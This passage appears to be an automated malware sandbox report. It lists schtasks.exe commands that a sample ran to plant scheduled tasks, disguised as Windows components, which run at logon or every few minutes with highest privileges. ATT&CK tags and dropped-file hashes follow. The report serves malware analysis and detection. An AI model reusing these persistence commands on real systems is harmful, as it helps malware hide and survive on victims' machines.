C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1564
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 12 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 9 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4636
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD54dafd9e9509ac96be6aa5baec659da4d
SHA1a091552663ddea89536560f232b8339f318c9cbc
SHA2560c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
SHA512d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
-
Filesize
1.8MB
MD511cca9e2c6dc9c2a728b89e7314ec26a
SHA158aec3b662a1c4e8b43cc454d90813ac89b5e612
SHA256300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
SHA512fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
-
Filesize
207B
MD5b292d233456b16f26abc1aa07c9f5de0
SHA17b025705136101b5618d81d8ebf472335eebde43
SHA256e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
SHA5121c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
-
Filesize
1KB
MD5af6acd95d59de87c04642509c30e81c1
SHA1f9549ae93fdb0a5861a79a08f60aa81c4b32377b
SHA2567521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6
SHA51293ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a
-
Filesize
168B
MD5811bf9eebedf563d2e9820add1ea17e9
SHA187cfe6ecaed35b211994fcd0e70a75e925f03d35
SHA2560a5770dae8ce79280ce277d1701320c0b1136adecd5dfe68a75d64c415fc109e
SHA512ec8dcfeab065eea18b821c39b30bf93da73aafde27f31e06a2b9c2437a030bd89b2bf2f7bcd406b532f0189a44a7f8deae5be3f43e758f39cb0794ee0e5e8760
-
Filesize
168B
MD54744074e9576965011ceffc14c561730
SHA135029e395fbd57320420582c98bf6528dcc6fbb7
SHA25611ce3a705a248e15b45d8685040a0f181a8cb6da9935d61df84235b1e1faf2b5
SHA512beaa381d9e96b3a18bae6d53355c3c92d1763828bb086c8f84965a4042a49d8ed0b7a82cd98ee8bd63897c7d715798b083638d475a760a59f8a940faedafe0fe
-
Filesize
216B
MD5eddbd1129ac924580b318c3d067c610d
SHA1e167ca303bc4c62c0b7ad38f52f02ccee2fbc1ab
SHA256bd3a006b9d4e37cc548f7a3fd636ebf04e647816b2427a26414bdbcafe4731e8
SHA512a4f17d93be96903c37e3936c92813b3fdd5f06efa6482bc330cebbbf8feae955ca1bb63d5552bee2b7b199ec553ea94b377c26c23ea587e1c7a2f93920a5df9c
-
Filesize
216B
MD599accb2a3c8dbda16e3997c5ba824e57
SHA11594e71a8282714f88f4b83234c32d5ed5aab1c8
SHA25667aab689a45ad20517e8d568bc958c675919be0b8ea886ecf75d19f80eb48092
SHA512b0f9225e47138398fdf30dfb536e893a618021393f20a8262fc2007eb99bbe7181d51e938390d494d39f53a6cf800601d560831d790516d5dbb0a83240812aa0
-
Filesize
168B
MD5af82a342bf67dbdb9c850dce58305cbc
SHA1e8a677bc6ae62d3647e5f04fbff9fa4e3fe37997
SHA2566308e811611a3ec56b1187af2ed3bc96929e443b51c4b216f62fd64e3e44cc55
SHA512a5c38f833f34bb8a52bb2d68ff01e94e3484d1f4ff2dba92ae5793d505c54efa6e2d542e0fd50c8e2f2f711b1da4516d63e405f60b5c9b530e39c9593874fa57
-
Filesize
216B
MD5ce4a037611babe6a1559cfab797219a5
SHA1fe4a0f711761a09a0f95cd719cf4bc53dbfeb16b
SHA2565bb3ec44d1eaf197bbc45d2c4110f917bab4227f7088bf38ddccb374fb3659d8
SHA51247ad971777734d6be5cc8980f802d8d1c883dc88bbaaf21eec71b46c86b8a412a00e2202739488f282f89e6726ebf72de526758e5faca67e6401dac224d80bba
-
Filesize
216B
MD5c1cba29b776e81f2b8368f5fd8af33d5
SHA1bcc89998cc38a55dda0933813c0852ca26ad6f94
SHA25639c8ea54814f93e07039f175d3d50102980f8fdceac89f55f4922290ce3e314b
SHA512900dcca616cd59fb5817cc1904be0e1a10695b29d34cdc8815bba1a54e1411e208b1a3011be79c2f54ccfff37fcd00991500169d88253daba3e4d6c385df8afc
-
Filesize
168B
MD56fda3b98f38b7a731119865f9808fd27
SHA10b0ecd4ebe0131ea77bf4182319e2cad2335df77
SHA2561e89fd3865c21bd07d738457c11020cd1edde596065260ef923f8fb2d4507d44
SHA512a9ffd5cc2947854e6118cdf4fe357dbc7348c961ce97bbfe660736dc4e969c9481e37be578dfdbbe21bc77c53238512fae87359d88a66405962d018ecd9c6891
-
Filesize
168B
MD5a188c920af68c342a0ad4f8f6ac31394
SHA108dedcc3919383bb35ba119218b26b065520c6b2
SHA256e1c43318902d4475a5e91e245cc6420b972c0ad33bfb0ab42a6e9a58efd65e78
SHA5128f143415b9bb947fc6106efcc300a1b40e35b812bf2ac7368332b542130e4041de01575024e7c12342111ab146366cf5c3bdb7d890cddc0037e642bde4d9e8ba
-
Filesize
168B
MD546cb298dc5522f250d368c3d03f6c85f
SHA1b3d0599f4a5243e6035675d3b640213811ca1685
SHA2565cc8df2d4295a2fb9d87fa6028a423c9e5b6be0d96fa22339b666519a6580d5e
SHA512583b1ba624774bf4135c39895a009ad1908149d6653152bb190ac3abb34fe879b6b0c7fdf58e01016bb364836cf37c3d0f0a334d0fbb2e596b1a55df88f3c160
-
Filesize
168B
MD54c3003a7ead41b3cd1549175e6472eba
SHA1ce807a1d474504b94dfb082be4fb9e2fcb036d86
SHA2567a303070e80c2eb81f097e889697a6bb3f4519621791d703fc28047d085260de
SHA512b8601394c6d5ae50d7be6ec9e71a3d9d701b574160ee2ab9f29a5597b4da634ab8c08c286a89b94ddf0cc61ce796aaa1a4df09f61c8c2ed49664c281c9e24e17
-
Filesize
168B
MD5940fdaf9219c6a809f35ab743c49e13d
SHA1f099ac6b2fe3cbf5717c79ac54b426f0b6e30ea4
SHA256c121da927dd9c1e99af5d277c08d836fb76fd17de2420ec514d17e267b2a1351
SHA5123c6b735055e5f203a42a9898ed7c4015b24ad7469f5d7932357ffd68358705e915a035b2045a44d514dfe39ebe788076d165ff52961f45ecdbc82ac7e0c4ecaf
-
Filesize
2.1MB
MD5bf4f13d82d217ed69d80124c50d9441c
SHA1b7ee7d109f61371342e924e6a0c3505347dd318f
SHA25651890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
SHA5121ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4